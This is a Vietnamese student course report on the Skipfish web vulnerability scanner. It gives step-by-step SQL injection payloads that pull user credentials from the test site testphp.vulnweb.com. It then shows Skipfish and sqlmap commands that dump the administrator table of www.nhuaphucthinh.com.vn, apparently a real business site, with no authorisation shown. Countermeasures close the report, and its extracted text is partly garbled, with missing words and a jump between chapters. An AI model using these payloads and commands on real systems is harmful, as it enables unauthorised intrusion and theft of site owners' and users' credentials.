BỘ THÔNG TIN VÀ TRUYỀN THÔNG HỌC VIỆN CÔNG NGHỆ BƯU CHÍNH VIỄN THƠNG 🙖🙐✰🙖🙐 BÀI BÁO CÁO KẾT THÚC HỌC PHẦN HỌC PHẦN: AN TOÀN MẠNG SKIPFISH – WEB APPLICATION SECURITY SCANNER MỤC LỤC DANH SÁCH THUẬT NGỮ VÀ VIẾT TẮT DANH MỤC HÌNH VẼ LỜI MỞ ĐẦU CHƯƠNG 1: GIỚI THIỆU VỀ CÔNG CỤ SKIPFISH 1.1Tổng quan công cụ Skipfish 1.2 Hướng dẫn cài đặt sử dụng công cụ Skipfish 14 1.3 Các vấn đề thường gặp cách khắc phục với công cụ Skipfish 36 CHƯƠNG 2: THỬ NGHIỆM KỊCH BẢN TẤN CÔNG TRÊN CÔNG CỤ SKIPFISH42 2.1 Các kỹ thuật cơng cơng cụ tích hợp sử dụng LAB 42 2.2 Kịch thử nghiệm công thực tế 43 KẾT LUẬN 67 TÀI LIỆU THAM KHẢO 68 DANH SÁCH THUẬT NGỮ VÀ VIẾT TẮT STT Từ viết tắt CPU CSS DNS EXIF GNU Thuật ngữ Tiếng Anh Central Processing Unit Thuật ngữ Tiếng Việt / Giải thích Là mạch điện tử máy tính,thực câu lệnh chương trình máy tính cách thực phép tính số học, logic, so sánh hoạt động nhập/xuất liệu (I/O) mã lệnh Cascading Style Sheets Được dùng để miêu tả cách trình bày tài liệu viết ngơn ngữ HTML XHTML Ngồi ngơn ngữ định kiểu theo tầng dùng cho XML, SVG, XUL Domain Name System Mang ý nghĩa đầy đủ hệ thống phân giải tên miền DNS phát minh vào năm 1984 cho Internet, hệ thống cho phép thiết lập tương ứng địa IP tên miền Exchangeable Image File Format Định dạng tệp hình ảnh trao đổi tiêu chuẩn định định dạng cho hình ảnh, âm thẻ phụ trợ sử dụng máy ảnh kỹ thuật số, máy quét hệ thống khác xử lý tệp hình ảnh âm ghi lại máy ảnh kỹ thuật số General Public License Là hệ điều hành sưu tập phần mềm máy tính phong phú GNU bao gồm tồn phần mềm tự do, hầu hết cấp phép theo General Public License GNU Project GUI HTTP Là thuật ngữ ngành cơng nghiệp máy tính Đó cách giao Graphical User Interface tiếp với máy tính hay thiết bị điện tử hình ảnh chữ viết thay dịng lệnh đơn HyperText Transfer Protocol Là giao thức lớp ứng dụng cho hệ thống thông tin siêu phương tiện phân tán, cộng tác Là giao tiếp hệ thống xử lý thơng tin hay máy tính với giới bên ngồi, người hệ thống xử lý thông tin khác I/O Input/Output IP Internet Protocol Địa IP / địa máy tính dùng để phân biệt kết nối với Inter Process Communication Trong khoa học máy tính, giao tiếp q trình giao tiếp trình (IPC) đề cập cụ thể đến chế mà hệ điều hành cung cấp phép trình quản lý liệu chia sẻ Intrusion Prevention System Là hệ thống phát xâm nhập khả theo dõi, giám sát cịn có chức ngăn chặn kịp thời hoạt động xâm nhập không mong muốn hệ thống máy tính Local Area Network Mạng máy tính nội bộ, giao tiếp cho phép máy tính kết nối với để làm việc chia sẻ liệu 10 11 12 IPC IPS LAN An toàn mạng - Nguyễn Thuỳ Linh DANH MỤC HÌNH VẼ Hình 1.1: Giới thiệu cơng cụ Skipfish Hình 1.2: Báo cáo Skipfish việc quét lỗ hổng bảo mật trang web 10 Hình 1.3: Bảng so sánh cơng cụ Skipfish Acunetix 11 Hình 1.4: Bảng so sánh cơng cụ Skipfish Nikto 11 Hình 1.5: Bảng so sánh đưa tính vượt trội Skipfish so với Grabber 12 Hình 1.6: Các phiên khác Skipfish trang chủ 15 Hình 1.7: Cách khởi động công cụ Skipfish câu lệnh Kali Linux 18 Hình 1.8: Cách khởi động cơng cụ Skipfish tích hợp sẵn Kali Linux 19 Hình 1.9: Các tính tham số cơng cụ Skipfish phần 20 Hình 1.10: Các tính tham số công cụ Skipfish phần 21 Hình 1.11: Các tham số tùy chọn xác thực truy cập 21 Hình 1.13: Các tham số cho tính tùy chọn phạm vi thu thập thơng tin 23 Hình 1.14: Các tham số cho tính báo cáo 25 Hình 1.15: Các tham số tùy chọn quản lý từ điển 26 Hình 1.16: Các tham số tính cài đặt hiệu suất 27 Hình 1.17: Các tham số tính số tùy chọn cài đặt khác 28 Hình 1.18: Trang báo cáo trình bày chi tiết mở trình duyệt 30 Hình 1.19: Sử dụng giao diện dịng lệnh Skipfish để thực rà quét 33 Hình 1.20: Giao diện hiển thị trường thông tin trình rà quét 34 Hình 1.21: Một giao diện khác xem chi tiết thư mục quét 34 Hình 1.22: Skipfish báo cáo trình rà quét thực xong 35 Hình 1.23: Thư mục báo cáo trích xuất sau q trình rà qt 35 Hình 1.24: Báo cáo chi tiết thơng tin thu thập cảnh báo sau trình rà quét 36 Hình 1.25: Thơng thường vấn đề ln cập nhật trang chủ Skipfish 41 Hình 2.1: Khởi động cơng cụ Skipfish Kali Linux 45 Hình 2.2: Truyền lệnh vào công cụ Skipfish để tiến hành rà qt 45 Hình 2.3: Hiển thị tính qt Skipfish 46 Hình 2.4: Một vài thơng số trình rà quét Skipfish 46 Hình 2.5: Chi tiết yêu cầu rà quét để thu thập thơng tin trang web 47 Hình 2.6: Thư mục chưa báo cáo đầu sau q trình qt hồn tất 48 Hình 2.7: Báo cáo kết cho trang web testphp.vulnweb.com trình duyệt 48 Hình 2.8: Giao diện đăng nhập trang web testphp.vulnweb.com 49 An toàn mạng - Nguyễn Thuỳ Linh Hình 2.9: Sử dụng truy vấn order by với N=3 50 Hình 2.10: Sử dụng truy vấn order by với N=4 51 Hình 2.11: Sử dụng truy vấn union select để trích xuất bảng bị lỗi hiển thị 52 Hình 2.12: Sử dụng truy vấn để kiểm tra phiên sở liệu 53 Hình 2.13: Sử dụng truy vấn để trích xuất tên sở liệu 54 Hình 2.14: Sử dụng truy vấn để trích xuất bảng có sở liệu 55 Hình 2.15: Sử dụng truy vấn trường thơng tin bảng users 56 Hình 2.16: Truy xuất thành cơng username password 57 Hình 2.17: Sử dụng username password vừa thu thập để đăng nhập 57 Hình 2.18: Giao diện đăng nhập thành cơng vào hệ thống 58 Hình 2.19: Mở cơng cụ Skipfish Kali Linux 58 Hình 2.20: Đưa vào câu lệnh để rà quét cho trang web nhuaphucthich.com.vn 59 Hình 2.21: Các tính rà qt cơng cụ Skipfish 59 Hình 2.22: Một số thơng tin hiển thị trình rà quét Skipfish 60 Hình 2.23: Quá trình thu thập thơng tin Skipfish 60 Hình 2.24: Thư mục đầu sau trình rà quét trang web nhuaphucthinh.com.vn 61 Hình 2.25: Bản báo cáo lỗ hổng liệu cho trang web nhuaphucthich.com.vn 61 Hình 2.26: Sử dụng SQL Map để trích xuất sở liệu 62 Hình 2.27: Các sở liệu trang web tìm thấy 62 Hình 2.28: Trích xuất liệu bảng sở liệu nhuaphucth_inh 63 Hình 2.29: Các bảng tồn sở liệu nhuaphucth_inh 63 Hình 2.30: Trích xuất thơng tin trường bảng administrator 63 Hình 2.31: Chi tiết trường thơng tin bảng administrator 64 Hình 2.32: Dùng lệnh –dump để trích xuất tất liệu bảng administrator 64 Hình 2.33: Lấy AdmPass AdmUsername người quản trị 64 An toàn mạng - Nguyễn Thuỳ Linh LỜI MỞ ĐẦU Hiện giới nói chung Việt Nam ta nói riêng quan tâm đến số vấn đề cộm nhức nhối vấn đề rị rỉ thơng tin, loại tội phạm xuất thời đại cơng nghệ tội phạm công nghệ cao, loại tin tặc chuyên đánh cắp thông tin (hacker) Những đối tượng thường xuyên khai thác, xâm nhập vào lỗ hỏng hệ thống thông tin, hệ thống mạng nhằm vào mục đích phá hoại, khai thác liệu quan trọng hệ thống Vấn nạn rị rỉ thơng tin khơng ảnh hưởng lớn đến phát triển mặt kinh tế quốc gia mà phá hoại diễn biến hịa bình an ninh quốc gia Do việc đảm bảo an tồn thơng tin cho hệ thống thông tin, hệ thống mạng điều quan trọng, cần thiết thiếu thời đại tin học hóa Việc đánh giá, kiểm thử, thử nghiệm ứng dụng web trình xây dựng, sau trình xây dựng vơ cần thiết hữu ích Công việc kiểm thử giúp cho ứng dụng web chịu đựng cơng kẻ cơng Có nhiều cơng cụ hữu ích giúp kiểm thử ứng dụng web Skipfish cơng cụ hữu ích mạnh mẽ phục vụ cho công việc rà quét thông tin lỗ hổng trang web, từ giúp khắc phục điểm yếu để làm cho hệ thống trở nên an toàn Ngồi giúp người sử dụng thống kê lại thư mục trang web để dễ dàng việc kiểm soát truy nhập Bài báo cáo nhằm mục đích giới thiệu cơng cụ Skipfish, cách cài đặt, sử dụng thực số kịch thử nghiệm dựa việc tích hợp công cụ với số công cụ hữu dụng khác Nội dung sử dụng cho mục đích học tập, nghiên cứu, khơng sử dụng với mục đích xấu ảnh hướng đến tổ chức, cá nhân Em xin chân thành cảm ơn đến giảng viên TS Đặng Minh Tuấn giúp em nhiều mơn học An tồn mạng em có đủ kiến thức kỹ để hồn thiện báo cáo cách hoàn chỉnh CHƯƠNG 1: GIỚI THIỆU VỀ CÔNG CỤ SKIPFISH 1.1Tổng quan cơng cụ Skipfish Skipfish trình qt ứng dụng web mã nguồn mở viết trì Michal Zalewski, Niels Heinen Sebastian Roschke Công cụ sử dụng ngơn ngữ lập trình C, phát triển Google có quyền bảo lưu vào năm 2009 – 2012 Khi Skipfish thức phát hành cấp phép cách đầy đủ theo điều khoản điều kiện Apache phiên 2.0 Hình 1.1: Giới thiệu cơng cụ Skipfish Mục tiêu Skipfish tương tự mục tiêu máy quét lỗ hổng bảo mật web trước Nmap Nessus, cho phép nhà phát triển web quét ứng dụng trang web họ để tìm vấn đề bảo mật tiềm ẩn Skipfish sử dụng để xác định xem mã bị cơng công phổ biến chèn đoạn mã cho trang web XSS, SQL công chèn XML hay không thực qt lỗ hổng với mức độ rủi ro cao, lỗ hổng rủi ro trung bình qt cố thấp Sau Skipfish hồn thành q trình qt nó, chuẩn bị đồ trang web tương tác cho trang web nhắm mục tiêu cách thực thu thập liệu đệ quy thăm dò dựa từ điển Skipfish cho dễ dàng xử lý 2.000 yêu cầu HTTP giây máy chủ kiểm tra xử lý tải Các vấn đề bảo mật mà Skipfish tập trung vào vấn đề trang web ứng dụng web internet giao diện khơng an tồn chúng Như nói trước Skipfish cho phép nhà phát triển quét ứng dụng cho lỗ hổng Một lỗ hổng bảo mật tình điều kiện gia tăng mối đe dọa làm tăng rủi ro, xác suất điều xảy Điều quan trọng cơng cụ nhà phát triển đợi xem liệu ứng dụng họ bị công không “Một biết điểm yếu mình, họ khơng làm chúng tơi gây hại” - trích dẫn Georg Christoph Lichtenberg Điều khẳng định Skipfish cho phép tìm điểm yếu ứng dụng thực biện pháp bảo vệ cần thiết để giảm thiểu nguy rủi ro gặp phải cách sớm hiệu Hình 1.2: Báo cáo Skipfish việc quét lỗ hổng bảo mật trang web Một số công cụ mã nguồn mở thương mại tiếng có chức tương tự Skipfish có sẵn ví dụ: Acunetix, Nikto, Websecurify, Netsparker, w3af, Arachni, … quen thuộc người làm ngành an ninh an tồn thơng tin sử dụng phổ biến tính dễ sử dụng chúng với giao diện GUI việc công cụ cập nhật thường xuyên tính tới thời điểm Chính khó so sánh với cơng cụ đơn giản Skipfish khơng hướng tới mục đích thương mại, mà đơn giản nhắm vấn đề nghiên cứu nhiều phiên sửa đổi gần trôi qua gần thập kỷ Chúng ta biết thời đại công nghệ nay, ngày trơi qua có thay đổi định nên cơng cụ ngày có khả rà quét cao nhiều Hình 1.3: Bảng so sánh công cụ Skipfish Acunetix Hình 1.4: Bảng so sánh cơng cụ Skipfish Nikto Từ bảng so sánh Skipfish với cơng cụ rà qt lỗ hổng ta thấy khả giám sát, tìm kiếm vấn đề bảo mật ứng dụng web, công cụ có bật Tuy nhiên để so sánh Skipfish với công cụ rà quét khác thời điểm Grabber, Vega, … kết mà cơng cụ đem lại ấn tượng đương nhiên nằm top đầu công cụ rà quét đáng để sử dụng 10 Hình 2.13: Sử dụng truy vấn để trích xuất tên sở liệu Bước 9: Sau biết phiên tên sở liệu, ta thực xuất tên bảng có sở liệu cú pháp sau: http://testphp.vulnweb.com/artists.php?artist=-1 union select 1, group_concat (table_name), from information_schema.tables where table_schema = database() 52 An toàn mạng - Nguyễn Thuỳ Linh Hình 2.14: Sử dụng truy vấn để trích xuất bảng có sở liệu Kết hiển thị có tất có bảng tồn sở liệu artists, carts, categ, featured, guestbook, pictures, products, users Bước 10: Khi truy xuất bảng sở liệu, ta nhắm vào bảng có chứa thơng tin nhạy cảm người dùng ta dễ dàng nhìn bảng có tên users Sau ta thực tìm cột có bảng users cú pháp sau: http://testphp.vulnweb.com/artists.php?artist=-1 union select 1, group_concat (column_name), from information_schema.columns where table_name = CHAR(117, 115, 101, 114, 115) Trong liệu biến table_name ta phải dịch từ dạng text sang dạng ASCII ngăn cách dấu “,” 53 An tồn mạng - Nguyễn Thuỳ Linh Hình 2.15: Sử dụng truy vấn trường thông tin bảng users Kết hiển thị có tất có cột tồn bảng users gồm address, cart, cc, email, name, pass, phone, uname Bước 11: Khi tìm cột bảng users, ta thấy hai cột quan trọng uname pass Đây thông tin đăng nhập người dùng mà ta muốn nhắm tới để đánh cắp để bypass Lúc ta thực cú pháp sau để lấy uname pass người dùng sở liệu: http://testphp.vulnweb.com/artists.php?artist=-1 union select 1, uname, pass from users 54 An tồn mạng - Nguyễn Thuỳ Linh Hình 2.16: Truy xuất thành công username password Kết thu được: ta lấy username password người dùng test:test sử dụng để đăng nhập thành cơng vào hệ thống Hình 2.17: Sử dụng username password vừa thu thập để đăng nhập 55 An tồn mạng - Nguyễn Thuỳ Linh Hình 2.18: Giao diện đăng nhập thành công vào hệ thống * Kịch số 2: Thực khai thác lỗ hổng SQL Injection trang web www.nhuaphucthinh.com.vn đánh cắp tài khoản mật người quản trị hệ thống sử dụng công cụ Skipfish SQL Map Bước 1: Khởi động Terminal Kali Linux khởi chạy công cụ Skipfish câu lệnh skipfish -h Hình 2.19: Mở cơng cụ Skipfish Kali Linux Bước 2: Sử dụng công cụ Skipfish để tiến hành rà quét lỗ hổng bảo mật trang web www.nhuaphucthinh.com.vn cách truyền vào câu lệnh skipfish -o outputdemo2 http://www.nhuaphucthinh.com.vn 56 An toàn mạng - Nguyễn Thuỳ Linh Hình 2.20: Đưa vào câu lệnh để rà quét cho trang web nhuaphucthich.com.vn Bước 3: Công cụ Skipfish bắt đầu trình rà quét thu thập liệu trang web số vấn đề bảo mật cấp độ cảnh bảo khác Tùy thuộc vào quy mô liệu trang web mà thời gian quét nhanh hay chậm Hình 2.21: Các tính rà qt cơng cụ Skipfish 57 An toàn mạng - Nguyễn Thuỳ Linh Hình 2.22: Một số thơng tin hiển thị q trình rà quét Skipfish Hình 2.23: Quá trình thu thập thơng tin Skipfish Bước 4: Khi hồn tất trình rà quét kết báo cáo lưu vào thư mục outputdemo2 truy cập thư mục ta chọn vào file index.html để hiển thị chi tiết báo cáo trình duyệt 58 An tồn mạng - Nguyễn Thuỳ Linh Hình 2.24: Thư mục đầu sau trình rà quét trang web nhuaphucthinh.com.vn Hình 2.25: Bản báo cáo lỗ hổng liệu cho trang web nhuaphucthich.com.vn Bản báo cáo chi tiết cho ta kết tài liệu thu thập trang web biểu diễn thư mục, điều quan trọng mà ta nhắm đến báo cáo 59 An toàn mạng - Nguyễn Thuỳ Linh trang web tồn lỗ hổng SQL Injection bước ta khai thác chúng Bước 4: Khởi động công cụ SQL Map Kali Linux để bắt đầu khai thác lỗ hổng SQL Injection Câu lệnh ta truy xuất sở liệu có hệ thống trang web: sqlmap -u http://www.nhuaphucthinh.com.vn/product.php?id=11 –dbs Hình 2.26: Sử dụng SQL Map để trích xuất sở liệu Sau câu lệnh thực thi, kết trả cho ta hai sở liệu hệ thống information_schema nhuaphucth_inh Ta đốn sở liệu sở liệu mặc định MySQL, nên ta nhắm vào sở liệu nhuaphucth_inh để truy xuất liệu Hình 2.27: Các sở liệu trang web tìm thấy Bước 5: Sau nhắm vào sở liệu cụ thể nhuaphucth_inh, ta trích xuất bảng có sở liệu với cụ pháp sau: sqlmap -u http://www.nhuaphucthinh.com.vn/product.php?id=11 -D nhuaphucth_inh –tables 60 An tồn mạng - Nguyễn Thuỳ Linh Hình 2.28: Trích xuất liệu bảng sở liệu nhuaphucth_inh Lúc kết trả cho ta có bảng sở liệu user, administrator, category, countries, doitac, manufacturer, permit, product Hình 2.29: Các bảng tồn sở liệu nhuaphucth_inh Bước 6: Vì mục tiêu chiếm tài khoản mật người quản trị hệ thống nên ta nhắm trực tiếp vào bảng có tên administrator để trích xuất trường thơng tin có bảng này, ta sử dụng câu lệnh sau: sqlmap -u http://www.nhuaphucthinh.com.vn/product.php?id=11 -D nhuaphucth_inh -T administrator –columns Hình 2.30: Trích xuất thơng tin trường bảng administrator Lúc kết trả cho ta có trường bảng administrator AdmActive, AdmFullName, AdmID, AdmNote, AdmPassword, AdmUsername, PerID 61 An toàn mạng - Nguyễn Thuỳ Linh Hình 2.31: Chi tiết trường thơng tin bảng administrator Bước 7: Thực trích xuất tồn liệu bảng với trường thông tin tương ứng bảng câu lệnh sau: sqlmap -u http://www.nhuaphucthinh.com.vn/product.php?id=11 -D nhuaphucth_inh -T administrator dump Hình 2.32: Dùng lệnh –dump để trích xuất tất liệu bảng administrator Kết thu được: trích xuất tồn thông tin người quản trị hệ thống lưu bảng administrator Và quan trọng lấy hai thông tin AdmPassword AdmUsername người quản trị hệ thống Hình 2.33: Lấy AdmPass AdmUsername người quản trị 62 An toàn mạng - Nguyễn Thuỳ Linh 2.3 Các biện pháp đối phó dựa thử nghiệm cơng Q trình thực nghiệm cơng SQL Injection thông qua việc rà quét công cụ Skipfish cho ta thấy SQL Injection lỗ hổng nghiêm trọng đánh cắp liệu người dùng chí chiếm quyền điều khiển hệ thống Vì số biện pháp để phịng chống cơng SQL Injection: + Các biện pháp phòng chống dựa kiểm tra lọc liệu đầu vào: • Kiểm tra tất liệu đầu vào, đặc biệt liệu nhập từ người dùng từ nguồn không tin cậy • Kiểm tra định dạng kích thước liệu đầu vào • Tạo lọc để lọc bỏ ký tự đặc biệt từ khóa ngơn ngữ trường hợp cần thiết mà kẻ cơng sử dụng: o Các ký tự đặc biệt: *, ‘, =, -o Các từ khóa: SELECT, INSERT, UPDATE, DELETE, DROP, + Các biện pháp phòng chống dựa việc sử dụng thủ tục (stored procedures) CSDL: • Đưa tất câu truy vấn (SELECT) cập nhật, sửa xóa liệu (INSERT, UPDATE, DELETE) vào thủ tục; liệu truyền vào thủ tục thông qua tham số -> tách liệu khỏi mã, giúp hạn ngăn chặn hiệu cơng chèn mã SQL • Hạn chế thực câu lệnh SQL động thủ tục • Cấm vơ hiệu hóa (disable) việc thực thủ tục hệ thống – thủ tục CSDL có sẵn cho phép can thiệp vào hệ quản trị CSDL hệ điều hành • Các Extended/system Stored Procedures MS-SQL xp_cmdshell cho phép chạy lệnh hệ điều hành + Các biện pháp phòng chống dựa thiết lập quyền truy nhập người dùng cho phù 63 An tồn mạng - Nguyễn Thuỳ Linh hợp: • Khơng sử dụng người dùng có quyền system admin database owner làm người dùng truy cập liệu Ví dụ: khơng dùng user sa (MS-SQL) root (MySQL) làm user truy cập liệu Chỉ dùng user cho mục đích quản trị • Chia nhóm người dùng, cấp quyền vừa đủ để truy cập bảng biểu, thực câu truy vấn chạy thủ tục • Tốt nhất, không cấp quyền thực câu truy vấn, cập nhật, sửa, xóa trực tiếp liệu; Thủ tục hóa tất câu lệnh cấp quyền thực thủ tục + Chủ động sử dụng công cụ rà quét lỗ hổng bảo mật để rà qt tìm lỗ hổng khắc phục: • Rà quét ứng dụng web/website sử dụng công cụ Skipfish hay công cụ rà quét lỗ hổng bảo mật khác để phát lỗi chèn mã SQL; • Sử dụng cơng cụ SQLmap (có thể tải từ trang sqlmap.org) - cơng cụ mã mở miễn phí viết Python: o Cho phép kiểm tra website tìm lỗi chèn mã SQL o Cho phép khai thác lỗi để điều khiển máy chủ CSDL o Hỗ trợ hầu hết máy chủ quản trị CSDL nay: MySQL, Oracle, PostgreSQL, Microsoft SQL Server, Microsoft Access, IBM DB2, SQLite, Firebird, Sybase SAP MaxDB 64 An toàn mạng - Nguyễn Thuỳ Linh KẾT LUẬN Sau tiến hành tìm hiểu cơng cụ Skipfish q trình thử nghiệm công so sánh công cụ với công cụ loại khác điểm mạnh điểm cịn hạn chế Nói chung công cụ rà quét mạnh năm 2010, nhiên việc dừng hẳn việc cập nhật công cụ từ thời điểm 2012 làm cho cơng cụ có đánh chút độ tin cậy khả bắt kịp công nghệ thua xa công cụ có chức rà qt khác ta biết công nghệ thông tin phát triển theo ngày nên ngày có lỗ hổng, điểm yếu tinh vi Dù sở hữu điểm mạnh riêng hữu ích việc tìm lỗ hổng bảo mật thu thập thông tin liệu Mặc dù em cố gắng tìm hiểu trình bày báo cáo thực công đoạn cách tỉ mỉ, tâm huyết chu Xong, báo cáo em khơng thể tránh khỏi lỗi sai khơng đáng có cách thức trình bày kiến thức chun mơn Vì vậy, em mong nhận đánh giá, nhận xét chia sẻ thầy báo cáo em Để từ em rút kiến thức kinh nghiệm phục vụ cho công việc nghiệp sau Một lần nữa, em xin gửi lời cảm ơn chân thành đến thầy! 65 An toàn mạng - Nguyễn Thuỳ Linh TÀI LIỆU THAM KHẢO [1] Zalewski, M., " Skipfish Doc For Project documentation," 2011 [Online] Available: https://code.google.com/archive/p/skipfish/wikis/SkipfishDoc.wiki [2] Kali Linux, " SkipFish - Web Application Security Scanner," 30 2021 [Online] Available: https://www.kalilinux.in/2021/01/sikpfish.html [3] SysTutorial, " Skipfish Tool - Linux Man Pages," 23 2015 [Online] Available: https://www.systutorials.com/docs/linux/man/1-skipfish/ [4] Kendy Chua, " SKIPFISH LATEST WINDOWS PRECOMPILED BINARY,” 10 Nov 2011 [Online] Available: https://kennychua.net/skipfish-latest-windowsprecompiled-binary/ [5] Devin Ford, Latana Banks, "Skipfish – Midterm Report," 24 2020 [Online] Available: http://www.famu.edu/cis/project4_skipfish.pdf [6] Lê Tuấn Anh, " Kiểm tra ứng dụng trực tuyến Skipfish Google," 25 2010 [Online] Available: https://quantrimang.com/kiem-tra-ung-dung-truc-tuyenskipfish-cua-google-67975 [7] Brisk Infosec, " Skipfish - powerful reconnaissance tool," 24 2021 [Online] Available: https://www.youtube.com/watch?v=kmroxG6GXdM [8] TechChip, “Skipfish Web Application Scanner Kali Linux tools”, 2018 [Online] Available: https://www.youtube.com/watch?v=YKILueSxLR0 [9] Matthew Fuller, “Skipfish - Introduction Tutorial”, 2012 [Online] Available: https://www.youtube.com/watch?v=kqx8rp7Cnwc [10] Geekforgeek, " How to use SQLMAP to test a website for SQL Injection," 2021 [Online] Available: https://www.geeksforgeeks.org/use-sqlmaptest-website-sql-injection-vulnerability/ 66 An toàn mạng - Nguyễn Thuỳ Linh ... công cụ Skipfish để rà quét trang web Để dễ hình dung trình hoạt động Skipfish ta đến với việc rà quét trực tiếp trang web xem báo cáo kết mà Skipfish đem lại Trang web thực rà quét trang web quản... Terminal, bật cơng cụ Skipfish sau: Chọn Applications -> 03 - Web Application Analysis -> skipfish Cụ thể hình đây: 17 An tồn mạng - Nguyễn Thuỳ Linh Hình 1.8: Cách khởi động cơng cụ Skipfish tích hợp... Giới thiệu cơng cụ Skipfish Hình 1.2: Báo cáo Skipfish việc quét lỗ hổng bảo mật trang web 10 Hình 1.3: Bảng so sánh cơng cụ Skipfish Acunetix 11 Hình 1.4: Bảng so sánh công cụ Skipfish Nikto 11